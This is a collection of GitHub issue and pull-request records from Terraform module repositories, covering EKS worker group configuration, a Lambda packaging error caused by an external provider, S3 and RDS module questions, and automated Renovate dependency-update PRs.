| id (string, len 4–10) | text (string, len 4–2.14M) | source (string, 2 classes) | created (timestamp[s]: 2001-05-16 21:05:09 – 2025-01-01 03:38:30) | added (timestamp: 2025-04-01 04:05:38 – 2025-04-01 07:14:06) | metadata (dict) |
|---|---|---|---|---|---|
947038482
|
"launch_template_id" and "launch_template_version" inside "worker_groups_launch_template" block
Is it possible to pass "launch_template_id" and "launch_template_version" inside a "worker_groups_launch_template" block, or is it allowed only inside a Node Group?
Even if I pass the Launch Template details, it still takes some default values (e.g., instance type m4.large) for the EC2 instance worker nodes.
terraform -v
Terraform v1.0.0
on windows_amd64
aws = {
source = "hashicorp/aws"
version = "3.50.0"
}
module "eks" {
source = "terraform-aws-modules/eks/aws"
version = "17.1.0"
cluster_name = local.eks_cluster_name
cluster_version = var.eks_cluster_version
vpc_id = module.vpc.vpc_id
subnets = module.vpc.private_subnets
worker_groups_launch_template = [
{
name = "worker-group-1"
asg_desired_capacity = var.eks_worker_nodes
asg_min_size = var.eks_worker_nodes
asg_max_size = var.eks_worker_nodes
launch_template_id = aws_launch_template.eks_launch_template.id
launch_template_version = aws_launch_template.eks_launch_template.latest_version
}
]
cluster_endpoint_private_access = true
write_kubeconfig = true
kubeconfig_output_path = "./kubeconfig/"
tags = local.tags
}
If it is not supported, is there any way to define an additional ebs volume ?
Please take a look at https://github.com/terraform-aws-modules/terraform-aws-eks/blob/master/examples/launch_templates/main.tf, which shows how to customize worker groups
regarding
"it is still taking some default values (e.g., instance type m4.large) for the EC2 instance worker nodes"
this is because you don't specify an `instance_type` in `worker_groups_launch_template`, so the module assumes defaults from this map: https://github.com/terraform-aws-modules/terraform-aws-eks/blob/c2bd137152945317124c4cded258f12662d267f4/local.tf#L51-L132
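A sketch of overriding the instance type (and attaching the extra EBS volume asked about above) directly in `worker_groups_launch_template`, assuming the v17 module's worker-group input names — check the linked example for the authoritative list:

```hcl
worker_groups_launch_template = [
  {
    name                 = "worker-group-1"
    instance_type        = "t3.large"  # overrides the m4.large default from the map above
    asg_desired_capacity = var.eks_worker_nodes
    asg_min_size         = var.eks_worker_nodes
    asg_max_size         = var.eks_worker_nodes

    # additional EBS volume attached to each worker node
    additional_ebs_volumes = [
      {
        block_device_name = "/dev/xvdb"
        volume_size       = 100
        encrypted         = true
      }
    ]
  }
]
```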
|
gharchive/issue
| 2021-07-18T13:47:39 |
2025-04-01T04:36:03.178635
|
{
"authors": [
"daroga0002",
"sujeetkp"
],
"repo": "terraform-aws-modules/terraform-aws-eks",
"url": "https://github.com/terraform-aws-modules/terraform-aws-eks/issues/1486",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1612104033
|
Lambda packaging suddenly failing.
Description
I can't honestly explain what is going on because it worked Friday and today it doesn't. I see no significant changes to anything related to this code. Already tried backing out to aws provider 4.56.0. Same exact messages.
│ Error: External Program Execution Failed
│
│ with module.edge_lambda.data.external.archive_prepare[0],
│ on .terraform/modules/edge_lambda/package.tf line 10, in data "external" "archive_prepare":
│ 10: program = [local.python, "${path.module}/package.py", "prepare"]
│
│ The data source received an unexpected error while attempting to execute the program.
│
│ Program: /usr/local/bin/python3
│ Error Message: Traceback (most recent call last):
│ File "/Users/spliskamatyshak/Documents/GitHub/discover-api/infrastructure/pipelines/acct-infra/.terraform/modules/edge_lambda/package.py", line 1627, in <module>
│ main()
│ File "/Users/spliskamatyshak/Documents/GitHub/discover-api/infrastructure/pipelines/acct-infra/.terraform/modules/edge_lambda/package.py", line 1623, in main
│ exit(args.command(args))
│ ^^^^^^^^^^^^^^^^^^
│ File "/Users/spliskamatyshak/Documents/GitHub/discover-api/infrastructure/pipelines/acct-infra/.terraform/modules/edge_lambda/package.py", line 1433, in prepare_command
│ content_hash.update(hash_extra.encode())
│ ^^^^^^^^^^^^^^^^^
│ AttributeError: 'NoneType' object has no attribute 'encode'
│
│ State: exit status 1
If your request is for a new feature, please use the Feature request template.
[*] ✋ I have searched the open/closed issues and my issue is not listed.
⚠️ Note
Before you submit an issue, please perform the following first:
Remove the local .terraform directory (! ONLY if state is stored remotely, which hopefully you are following that best practice!): rm -rf .terraform/
Re-initialize the project root to pull down modules: terraform init
Re-attempt your terraform plan or apply and check if the issue still persists
Versions
Module version [Required]:
4.10.1
Terraform version:
1.3.9
Provider version(s):
provider registry.terraform.io/hashicorp/aws v4.57.0
provider registry.terraform.io/hashicorp/external v2.3.0
provider registry.terraform.io/hashicorp/local v2.3.0
provider registry.terraform.io/hashicorp/null v3.2.1
Reproduction Code [Required]
Steps to reproduce the behavior:
module "edge_lambda" {
source = "terraform-aws-modules/lambda/aws"
version = "~> 4.10"
function_name = "within3-discover-headers"
description = "Edge lambda for auth0"
handler = "index.header"
runtime = "nodejs16.x"
lambda_at_edge = true
source_path = "${path.root}/../../fixtures/edge"
}
Expected behavior
Should package the lambda as it has until today.
Actual behavior
See error above.
Terminal Output Screenshot(s)
Additional context
I am also facing this issue for our prod deployment on version 1.38.0.
Did anyone find the root cause or a fix for this issue?
It appears this could be related to the external provider used for the data source.
Link to relevant issue and discussion: https://github.com/hashicorp/terraform-provider-external/issues/193
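The traceback above is a plain Python failure mode: `hashlib`'s `update` path is handed a value that came back as `None`. A minimal standalone repro (not the module's code), assuming `hash_extra` arrives unset:

```python
import hashlib

content_hash = hashlib.sha256()
hash_extra = None  # what package.py received when hash_extra was unset

try:
    content_hash.update(hash_extra.encode())
except AttributeError as exc:
    print(exc)  # 'NoneType' object has no attribute 'encode'
```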
Setting the hash_extra input to an arbitrary value got around this issue.
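That workaround, sketched against the module call from the reproduction above (the value itself is arbitrary):

```hcl
module "edge_lambda" {
  source  = "terraform-aws-modules/lambda/aws"
  version = "~> 4.10"

  function_name  = "within3-discover-headers"
  description    = "Edge lambda for auth0"
  handler        = "index.header"
  runtime        = "nodejs16.x"
  lambda_at_edge = true
  source_path    = "${path.root}/../../fixtures/edge"

  # any non-null string sidesteps the NoneType .encode() crash
  hash_extra = "edge-lambda"
}
```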
Updating to v2.3.1 of the external provider fixed the issue for my team.
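One way to enforce the fixed provider explicitly, as a sketch (v2.3.1 being the version reported above to resolve it):

```hcl
terraform {
  required_providers {
    external = {
      source  = "hashicorp/external"
      version = ">= 2.3.1"  # v2.3.0 triggered the packaging crash above
    }
  }
}
```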
If you are obtaining the latest provider (i.e., not pinning a version constraint), the next deployment should pick this up from the registry.
I ended up blowing away my repo locally and recloning before things started working again. I'm guessing ultimately, it was the external provider update that actually fixed this.
|
gharchive/issue
| 2023-03-06T19:52:00 |
2025-04-01T04:36:03.189253
|
{
"authors": [
"drewclardy",
"kunalmbm",
"pneigel-ca",
"spliskamatyshak-w3"
],
"repo": "terraform-aws-modules/terraform-aws-lambda",
"url": "https://github.com/terraform-aws-modules/terraform-aws-lambda/issues/430",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
411894436
|
Missing support for publicly accessible instances
It would be nice if the module supported the `publicly_accessible` boolean in order to allow access from outside of the VPC.
It is already there, publicly_accessible = true
Completely missed it, my bad
No problems :)
|
gharchive/issue
| 2019-02-19T12:14:37 |
2025-04-01T04:36:03.191477
|
{
"authors": [
"Blokje5",
"antonbabenko"
],
"repo": "terraform-aws-modules/terraform-aws-rds-aurora",
"url": "https://github.com/terraform-aws-modules/terraform-aws-rds-aurora/issues/26",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
678938981
|
Aurora Serverless
How can I provision Aurora serverless using this module?
Hi @sachin-101 !
Check out another module's example - https://github.com/terraform-aws-modules/terraform-aws-rds-aurora/tree/master/examples/serverless
Thanks @antonbabenko . Would be awesome if you changed the link for Aurora Serverless (on https://serverless.tf) to point to the above examples rather than this repo's examples.
Good point! Updated.
|
gharchive/issue
| 2020-08-14T06:39:58 |
2025-04-01T04:36:03.193852
|
{
"authors": [
"antonbabenko",
"sachin-101"
],
"repo": "terraform-aws-modules/terraform-aws-rds",
"url": "https://github.com/terraform-aws-modules/terraform-aws-rds/issues/248",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
407319112
|
Create branch tf_0.12
Please, create a branch to keep the module files related to the Terraform 0.12 version.
Submit PR to master branch.
|
gharchive/issue
| 2019-02-06T16:27:29 |
2025-04-01T04:36:03.194751
|
{
"authors": [
"antonbabenko",
"bamaralf"
],
"repo": "terraform-aws-modules/terraform-aws-s3-bucket",
"url": "https://github.com/terraform-aws-modules/terraform-aws-s3-bucket/issues/2",
"license": "apache-2.0",
"license_type": "permissive",
"license_source": "bigquery"
}
|
871058733
|
Bug on s3_bucket_id output
Description
Please provide a clear and concise description of the issue you are encountering, your current setup, and what steps led up to the issue. If you can provide a reproduction, that will help tremendously.
⚠️ Note
Before you submit an issue, please perform the following first:
Remove the local .terraform directory (! ONLY if state is stored remotely, which hopefully you are following that best practice!): rm -rf .terraform/
Re-initialize the project root to pull down modules: terraform init
Re-attempt your terraform plan or apply and check if the issue still persists
Versions
Terraform:
Terraform v0.15.0
Provider(s):
provider registry.terraform.io/hashicorp/aws v3.37.0
Module:
module "s3_static_site" {
source = "terraform-aws-modules/s3-bucket/aws"
version = "~> 2.0"
...
}
Reproduction
Steps to reproduce the behavior:
data "aws_iam_policy_document" "cdn_s3_policy" {
statement {
actions = ["s3:GetObject"]
resources = ["${module.s3_static_site.s3_bucket_arn}/*"]
principals {
type = "AWS"
identifiers = module.cdn.cloudfront_origin_access_identity_iam_arns
}
}
}
resource "aws_s3_bucket_policy" "cdn_bucket_policy" {
bucket = module.s3_static_site.s3_bucket_id
policy = data.aws_iam_policy_document.cdn_s3_policy.json
}
The actual error during apply attempt:
│
│ on static_site.tf line 77, in resource "aws_s3_bucket_policy" "cdn_bucket_policy":
│ 77: bucket = module.s3_static_site.s3_bucket_id
│ ├────────────────
│ │ module.s3_static_site.s3_bucket_id is a object, known only after apply
│
│ Inappropriate value for attribute "bucket": string required.
yes
yes
Code Snippet to Reproduce
Expected behavior
The name of the bucket should be a string.
Actual behavior
Terminal Output Screenshot(s)
Additional context
It should be:
output "s3_bucket_id" {
  description = "The name of the bucket."
  value       = element(concat(aws_s3_bucket.this.*.id, [""]), 0)
}
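An equivalent null-safe output on Terraform 0.15+, using `try` — a sketch, not the module's actual code:

```hcl
output "s3_bucket_id" {
  description = "The name of the bucket."
  value       = try(aws_s3_bucket.this[0].id, "")
}
```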
I am not sure what the problem is here, but please fill in the template when opening an issue (not just copy-paste it).
Sure, let me try again then.
|
gharchive/issue
| 2021-04-29T14:10:25 |
2025-04-01T04:36:03.201293
|
{
"authors": [
"antonbabenko",
"atrakic"
],
"repo": "terraform-aws-modules/terraform-aws-s3-bucket",
"url": "https://github.com/terraform-aws-modules/terraform-aws-s3-bucket/issues/89",
"license": "apache-2.0",
"license_type": "permissive",
"license_source": "bigquery"
}
|
2328472095
|
fix(deps): update terraform terraform-ibm-modules/cos/ibm to v8.3.1
This PR contains the following updates:
Package
Type
Update
Change
terraform-ibm-modules/cos/ibm (source)
module
minor
8.2.10 -> 8.3.1
Release Notes
terraform-ibm-modules/terraform-ibm-cos (terraform-ibm-modules/cos/ibm)
v8.3.1
Compare Source
Bug Fixes
fixed bug in validation of resource_keys roles. It was incorrectly checking for None and now it correctly checks for NONE (#632) (5473ee2)
v8.3.0
Compare Source
Features
add support to scope resource keys to 'None' role (#626) (49cd08a)
v8.2.14
Compare Source
Bug Fixes
deps: update terraform terraform-ibm-modules/kms-all-inclusive/ibm to v4.13.1 (#630) (078cc08)
v8.2.13
Compare Source
Bug Fixes
deps: update terraform-module (#627) (122e15f)
v8.2.12
Compare Source
Bug Fixes
deps: update terraform ibm to latest for the deployable architecture solution (#628) (e93be43)
v8.2.11
Compare Source
Bug Fixes
fix bug related to missing KMS auth policy (#621) (a395e83)
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
/run pipeline
/run pipeline
/run pipeline
/run pipeline
/run pipeline
/run pipeline
:tada: This PR is included in version 1.0.10 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2024-05-31T19:32:51 |
2025-04-01T04:36:03.219143
|
{
"authors": [
"terraform-ibm-modules-dev",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/sample-deployable-architectures",
"url": "https://github.com/terraform-ibm-modules/sample-deployable-architectures/pull/18",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1502832706
|
chore(deps): update common-dev-assets digest to 3e33725
This PR contains the following updates:
Package
Update
Change
common-dev-assets
digest
da6272e -> 3e33725
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, click this checkbox.
This PR has been generated by Renovate Bot.
:tada: This PR is included in version 1.1.1 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2022-12-19T12:05:57 |
2025-04-01T04:36:03.224706
|
{
"authors": [
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-cis",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-cis/pull/22",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1834953843
|
fix: add sleep to wait for sg creation
Description
https://github.com/terraform-ibm-modules/terraform-ibm-client-to-site-vpn/issues/45
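The fix named in the title can be sketched with the hashicorp/time provider; resource names here are assumed, not the PR's actual diff:

```hcl
# security group whose creation needs time to propagate
resource "ibm_is_security_group" "client_to_site_sg" {
  name = "client-to-site-vpn-sg"
  vpc  = var.vpc_id
}

# pause after creation so dependent resources don't race the SG
resource "time_sleep" "wait_for_sg_creation" {
  depends_on      = [ibm_is_security_group.client_to_site_sg]
  create_duration = "30s"
}
```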
Release required?
Identify the type of release. For information about the changes in a semantic versioning release, see Release versioning.
[ ] No release
[ ] Patch release (x.x.X)
[ ] Minor release (x.X.x)
[ ] Major release (X.x.x)
Release notes content
If a release is required, replace this text with information that users need to know about the release. Write the release notes to help users understand the changes, and include information about how to update from the previous version.
Your notes help the merger write the commit message for the PR that is published in the release notes for the module.
Run the pipeline
If the CI pipeline doesn't run when you create the PR, the PR requires a user with GitHub collaborators access to run the pipeline.
Run the CI pipeline when the PR is ready for review and you expect tests to pass. Add a comment to the PR with the following text:
/run pipeline
Checklist for reviewers
[ ] If relevant, a test for the change is included or updated with this PR.
[ ] If relevant, documentation for the change is included or updated with this PR.
Merge actions for mergers
Use a relevant conventional commit message that is based on the PR contents and any release notes provided by the PR author. The commit message determines whether a new version of the module is needed, and if so, which semver increment to use (major, minor, or patch).
Merge by using "Squash and merge".
/run pipeline
@jor2 Thanks for the PR. Firstly, this PR needs to be merged to unblock pipeline. Secondly, please be aware that in this PR, the landing-zone example is moving directories. I may actually bundle this change into that PR now (maybe you can review it?) and close this PR to avoid conflicts
@jor2 I've included the workaround in https://github.com/terraform-ibm-modules/terraform-ibm-client-to-site-vpn/pull/49 - can you please review?
Closing this issue
|
gharchive/pull-request
| 2023-08-03T12:20:24 |
2025-04-01T04:36:03.231762
|
{
"authors": [
"jor2",
"ocofaigh"
],
"repo": "terraform-ibm-modules/terraform-ibm-client-to-site-vpn",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-client-to-site-vpn/pull/48",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
2061108148
|
chore(deps): update common-dev-assets digest to 4821104
This PR contains the following updates:
Package
Update
Change
common-dev-assets
digest
e1289a9 -> 4821104
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
/run pipeline
:tada: This PR is included in version 1.1.6 :tada:
The release is available on:
GitHub release
v1.1.6
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2023-12-31T16:19:28 |
2025-04-01T04:36:03.238103
|
{
"authors": [
"terraform-ibm-modules-dev",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-cloudant",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-cloudant/pull/67",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
2103228680
|
chore(deps): update ci dependencies
This PR contains the following updates:
Package
Type
Update
Change
common-dev-assets
digest
00d2055 -> 6980d55
github.com/terraform-ibm-modules/ibmcloud-terratest-wrapper
require
patch
v1.27.1 -> v1.27.2
Release Notes
terraform-ibm-modules/ibmcloud-terratest-wrapper (github.com/terraform-ibm-modules/ibmcloud-terratest-wrapper)
v1.27.2
Compare Source
Bug Fixes
deps: update module github.com/ibm/platform-services-go-sdk to v0.56.3 (#749) (2f431a0)
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
/run pipeline
/run pipeline
:tada: This PR is included in version 1.0.4 :tada:
The release is available on:
GitHub release
v1.0.4
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2024-01-27T05:00:03 |
2025-04-01T04:36:03.247657
|
{
"authors": [
"terraform-ibm-modules-dev",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-hpc",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-hpc/pull/110",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1615701506
|
chore(deps): update common-dev-assets digest to e991e92
This PR contains the following updates:
Package
Update
Change
common-dev-assets
digest
c11b977 -> e991e92
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
:tada: This PR is included in version 1.1.2 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2023-03-08T18:11:23 |
2025-04-01T04:36:03.253330
|
{
"authors": [
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-icd-mongodb",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-icd-mongodb/pull/49",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1552342595
|
chore(deps): update common-dev-assets digest to f46cdab
This PR contains the following updates:
Package
Update
Change
common-dev-assets
digest
eda55fa -> f46cdab
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, click this checkbox.
This PR has been generated by Renovate Bot.
:tada: This PR is included in version 2.0.0 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2023-01-23T00:07:35 |
2025-04-01T04:36:03.258628
|
{
"authors": [
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-icse-key-management",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-icse-key-management/pull/183",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1510448274
|
chore(deps): update common-dev-assets digest to 3e70ea2
This PR contains the following updates:
Package
Update
Change
common-dev-assets
digest
d8a541e -> 3e70ea2
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, click this checkbox.
This PR has been generated by Renovate Bot.
:tada: This PR is included in version 1.0.4 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2022-12-26T00:09:47 |
2025-04-01T04:36:03.264324
|
{
"authors": [
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-icse-network-acl",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-icse-network-acl/pull/81",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
2034287198
|
chore(deps): update module github.com/terraform-ibm-modules/ibmcloud-terratest-wrapper to v1.25.6
This PR contains the following updates:
Package
Type
Update
Change
github.com/terraform-ibm-modules/ibmcloud-terratest-wrapper
require
patch
v1.25.5 -> v1.25.6
Release Notes
terraform-ibm-modules/ibmcloud-terratest-wrapper (github.com/terraform-ibm-modules/ibmcloud-terratest-wrapper)
v1.25.6
Compare Source
Bug Fixes
deps: update module github.com/go-git/go-git/v5 to v5.11.0 (#714) (021df86)
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
/run pipeline
:tada: This PR is included in version 2.5.0 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2023-12-10T09:19:47 |
2025-04-01T04:36:03.273193
|
{
"authors": [
"terraform-ibm-modules-dev",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-key-protect",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-key-protect/pull/489",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1772364450
|
chore(deps): update common-dev-assets digest to 54b3d7e
This PR contains the following updates:
Package
Update
Change
common-dev-assets
digest
593e4fb -> 54b3d7e
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
/run pipeline
/run pipeline
/run pipeline
|
gharchive/pull-request
| 2023-06-24T01:01:02 |
2025-04-01T04:36:03.278163
|
{
"authors": [
"terraform-ibm-modules-dev",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-kms-key-ring",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-kms-key-ring/pull/395",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
2458862764
|
chore(deps): update terraform terraform-ibm-modules/key-protect/ibm to v2.8.2
This PR contains the following updates:
Package
Type
Update
Change
terraform-ibm-modules/key-protect/ibm (source)
module
patch
2.8.1 -> 2.8.2
Release Notes
terraform-ibm-modules/terraform-ibm-key-protect (terraform-ibm-modules/key-protect/ibm)
v2.8.2
Compare Source
Bug Fixes
deps: update terraform terraform-ibm-modules/cbr/ibm to v1.23.3 (#603) (ba60906)
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
/run pipeline
:tada: This PR is included in version 2.5.0 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2024-08-10T02:44:32 |
2025-04-01T04:36:03.286911
|
{
"authors": [
"terraform-ibm-modules-dev",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-kms-key-ring",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-kms-key-ring/pull/612",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
2328700647
|
chore(deps): update ci dependencies
This PR contains the following updates:
Package
Type
Update
Change
common-dev-assets
digest
b4db5fd -> 0e4338f
terraform-ibm-modules/common-pipeline-assets
action
patch
v1.22.1 -> v1.22.2
Release Notes
terraform-ibm-modules/common-pipeline-assets (terraform-ibm-modules/common-pipeline-assets)
v1.22.2
Compare Source
Bug Fixes
replace ORG_READER_GH_TOKEN with GITHUB_TOKEN (#693)
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
/run pipeline
:tada: This PR is included in version 1.2.4 :tada:
The release is available on GitHub release
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2024-05-31T23:17:15 |
2025-04-01T04:36:03.295406
|
{
"authors": [
"terraform-ibm-modules-dev",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-kms-key",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-kms-key/pull/587",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
1510449055
|
chore(deps): update common-dev-assets digest to 668972c
This PR contains the following updates:
Package
Update
Change
common-dev-assets
digest
d8a541e -> 668972c
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, click this checkbox.
This PR has been generated by Renovate Bot.
:tada: This PR is included in version 1.13.1 :tada:
The release is available on:
GitHub release
v1.13.1
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2022-12-26T00:12:11 |
2025-04-01T04:36:03.301362
|
{
"authors": [
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-landing-zone",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-landing-zone/pull/232",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
2217176501
|
chore(deps): update module github.com/terraform-ibm-modules/ibmcloud-terratest-wrapper to v1.30.3
This PR contains the following updates:
Package
Type
Update
Change
github.com/terraform-ibm-modules/ibmcloud-terratest-wrapper
require
patch
v1.30.2 -> v1.30.3
Release Notes
terraform-ibm-modules/ibmcloud-terratest-wrapper (github.com/terraform-ibm-modules/ibmcloud-terratest-wrapper)
v1.30.3
Compare Source
Bug Fixes
deps: update module github.com/go-git/go-git/v5 to v5.12.0 (#787) (9c597d6)
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.
[ ] If you want to rebase/retry this PR, check this box
This PR has been generated by Renovate Bot.
/run pipeline
/run pipeline
/run pipeline
:tada: This PR is included in version 5.20.4 :tada:
The release is available on:
GitHub release
v5.20.4
Your semantic-release bot :package::rocket:
|
gharchive/pull-request
| 2024-03-31T20:46:49 |
2025-04-01T04:36:03.310603
|
{
"authors": [
"ocofaigh",
"terraform-ibm-modules-dev",
"terraform-ibm-modules-ops"
],
"repo": "terraform-ibm-modules/terraform-ibm-landing-zone",
"url": "https://github.com/terraform-ibm-modules/terraform-ibm-landing-zone/pull/759",
"license": "Apache-2.0",
"license_type": "permissive",
"license_source": "github-api"
}
|
2265693263
|
Do not use external data blocks to execute long running script
The code is currently using an external data block for install_verify and maximo_admin_url. These run on every terraform plan, and it seems like they take a LONG time to execute. For example, I see this one took 90mins: module.existing_cluster.data.external.install_verify: Read complete after 1h30m18s [id=-]
This is not something you want happening on terraform plan! To make it run only on apply, you should use a null_resource block (as you did for the pipeline_verify resource)
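The suggested shape, sketched with assumed names (the real change is tracked in the linked PR):

```hcl
# runs only during apply, never on plan/refresh
resource "null_resource" "install_verify" {
  triggers = {
    cluster_id = var.cluster_id  # re-run verification when the cluster changes
  }

  provisioner "local-exec" {
    command = "${path.module}/scripts/install_verify.sh"
  }
}
```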
Being addressed in https://github.com/terraform-ibm-modules/terraform-ibm-mas/pull/56
|
gharchive/issue
| 2024-04-26T12:34:57 |
2025-04-01T04:36:03.312615
|
{
"authors": [
"ocofaigh"
],
